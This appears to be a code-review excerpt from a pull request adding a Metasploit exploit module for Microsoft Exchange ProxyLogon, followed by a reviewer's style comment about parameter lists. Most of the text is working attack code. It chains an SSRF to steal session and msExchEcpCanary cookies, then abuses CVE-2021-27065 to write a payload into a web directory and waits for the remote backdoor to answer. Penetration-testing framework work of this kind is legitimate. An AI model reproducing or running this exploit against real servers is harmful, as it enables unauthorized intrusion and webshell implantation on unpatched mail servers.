modules/exploits/windows/http/exchange_proxylogon_rce.rb

```diff
@@ -0,0 +1,532 @@
+
+    # get the user UID using mapi request.
+    print_status(message('Sending mapi request'))
+    sid = request_mapi(server_name, legacy_dn, server_id)
+    print_status("SID: #{sid} (#{datastore['EMAIL']})")
+
+    # search oab
+    sid, session, canary, oab_id = search_oab(server_name, sid)
+
+    [server_name, sid, session, canary, oab_id]
+  end
+
+  # post-auth arbitrary file write.
+  def run_cve_2021_27065(session_info)
+    # set external url (and set the payload).
+    print_status('Prepare the payload on the remote target')
+    input_name = install_payload(session_info)
+
+    fail_with(Failure::Unknown, 'Could\'t prepare the payload on the remote target') if input_name.empty?
+
+    # reset the virtual directory (and write the payload).
+    print_status('Write the payload on the remote target')
+    remote_file = write_payload(session_info)
+
+    fail_with(Failure::Unknown, 'Could\'t write the payload on the remote target') if remote_file.empty?
+
+    web_dir = datastore['ExchangeWritePath'].gsub('\\', '/')
+
+    # wait a lot.
+    i = 0
+    while i < datastore['MaxWaitLoop']
+      received = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(web_dir, remote_file)
+      })
+      if received && (received.code == 200)
+        break
+      end
+
+      print_warning("Wait a lot (#{i})")
+      sleep 5
+      i += 1
+    end
+    fail_with(Failure::Unknown, 'Could\'t take the remote backdoor (see. ExchangePathBase option)') if received.code == 302
+
+    [input_name, remote_file]
+  end
+
+  def search_oab(server_name, sid)
+    # request cookies (session and canary)
+    print_status(message('Sending ProxyLogon request'))
+
+    print_status('Try to get a good msExchCanary (by patching user SID method)')
+    session_id, canary = request_proxylogon(server_name, patch_sid(sid))
+    if canary
+      session = "ASP.NET_SessionId=#{session_id}; msExchEcpCanary=#{canary};"
+      oab_id = request_oab(server_name, sid, session, canary)
+    end
+
+    if oab_id.empty?
+      print_status('Try to get a good msExchCanary (without correcting the user SID)')
+      session_id, canary = request_proxylogon(server_name, sid)
+      if canary
+        session = "ASP.NET_SessionId=#{session_id}; msExchEcpCanary=#{canary};"
+        oab_id = request_oab(server_name, sid, session, canary)
+      end
+    end
+
+    fail_with(Failure::Unknown, 'No \'ASP.NET_SessionId\' was found') if session_id.nil? || session_id.empty?
+    fail_with(Failure::Unknown, 'No \'msExchEcpCanary\' was found') if canary.nil? || canary.empty?
+    fail_with(Failure::Unknown, 'No \'OAB Id\' was found') if oab_id.empty?
+
+    print_status("ASP.NET_SessionId: #{session_id}")
+    print_status("msExchEcpCanary: #{canary}")
+    print_status("OAB id: #{oab_id[1]} (#{oab_id[0]})")
+
+    return [sid, session, canary, oab_id]
+  end
+
+  def send_http(method, ssrf, data: '', cookie: '', ctype: '', headers: {})
```

Comment:
Rubocop also complains about this: `Avoid parameter lists longer than 5 parameters.`
It is recommended to use a hash to reduce the number of parameters:
```suggestion
  def send_http(method, ssrf, opt = {})
```
and access the data with `opt[:data]`, etc. The call syntax should not change.